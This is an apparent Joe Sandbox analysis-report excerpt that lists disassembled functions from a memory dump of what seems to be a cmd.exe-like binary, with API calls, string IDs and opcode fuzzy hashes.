                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2081463915-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5f0f9fde0766a32344fe05ab7abfab6a12cbe1256ccf7d05b5b8ee0778a6fda9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3716621E0824F85FB66BB24A8582BDB2A0AF01754FD5053BE91F426B1DFFCE4918270
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 840959033-3627297882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c7bbdf72d37530d9f0addba3914115681a45449b97e967dd01a61ce2ddc695b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99D17B22A0864BC6FB54BF21E8452BDB6A0AF54B44FD48077D90F862B6DFBCE4458770
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15132F3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7D15132A4), ref: 00007FF7D1513309
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D1513384
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D15311DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: CreateFile_open_osfhandle
• String ID: con
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
• String ID: CSVFS$NTFS$REFS
APIs
• longjmp.MSVCRT(?,00000000,00000000,00007FF7D1517279,?,?,?,?,?,00007FF7D151BFA9), ref: 00007FF7D1534485
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: longjmp
• String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 322c5cfc7085a76491137e66a5cd7dbef5c550a58f217e12f15cbc0909c32713
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3C17E60E0C64B81F725BB1A55856BCA791AB56B84FE14037DD0F536B2CFBCE8868360
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D1526677
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D152668F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _errno.MSVCRT ref: 00007FF7D15266A3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D15266C4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266E4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266FE
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2348642995-441775793
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fb79f6ddb9e74c17efb699e0fa1162a98c71d9a5d01a277147ec5e32a658f81b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19715C67908A5BC5F7606F21E45017DF7A0EB55B84FD88077DA4F862A4EFBCA484C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3223794493-3086019870
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 75b9d129e47d1759fc79ab3cbc8313769d05a4843cc5bd683531d238640ba622
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6517B25A08A4B8AFB55AB15A41017DBBA0EB49B50FD89576CA5F433B0DFBCE085C730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s$/-.$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1644023181-879152773
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4dd2a969bb7c23e063f632605d00564cb883c8619fe93ded7d1f8bf6df6454f3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7691B022B0864B81FB59ABA0D4502BEE2A1EF80B90FD44677D94F436B4DEBCE545C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1537251), ref: 00007FF7D153628E
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: wil
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d9dbaaaab8527c625183ccb233f0d383893d9d5630bb39c58e596b3bffe177d2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA416021A0854B87F3606B11E40027DE6A1EF86781FE08136E90B47AF4CFBDE9498721
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1397130798-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 724f7ca6de1d2199ac7a1f6292729104aec5d7855033ff602e4af0a6132ac251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4891A522B0868B96FB65AB10D4406BDF3A1FB84B84FC58076DA4F437A4DFBDD5818720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225E8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D152260F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522636
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522650
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3407644289-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 827fe39f1c827591467e2895404ed0c53e3c9c8069902dc6501238c6b755d561
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0313A27A1851B85FB617F21E81537DA694AF85B80FE48077DA0F862B5DEBCE400C731
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT ref: 00007FF7D1527EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3731854180-3554254475
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c25690b87a8360884804bcb8229e23bcc020eb00867746f7a7ec783d5e755514
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75A16C22A0968B85F760AF51A85027DF6A0FB59790FD08136DA5F877B4DFBCE441CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: PE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2941894976-4258593460
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d3dbf6eefc0a2a227ef4b7c3a1a58b27db0905244b1f318b974def68cec07f75
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F414161A0869B86F760BB11E41027DF7A0FB89B90FD44232DA5E43BA5DF7DE445CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Enum$Openwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3402383852-1459555574
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d4f4c8f74af0d88aae95a380f5de156173e19187bb68339be651d734a87c6bac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14A1A3A2A0864B82FB11BB55D0542BEE3A0EF86B90FD44532DA4F077A4DFBCD945C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %04X-%04X$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 930873262-1938371929
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 479f350910c1d7edeb5b2b6a9a7a351206144802c38d22ce21a0ea5ed230f0e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25414B21A0CA8B82FB64AB60E4502BEF3A0EB88755FD04137DA5F436A5DFBCD545C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
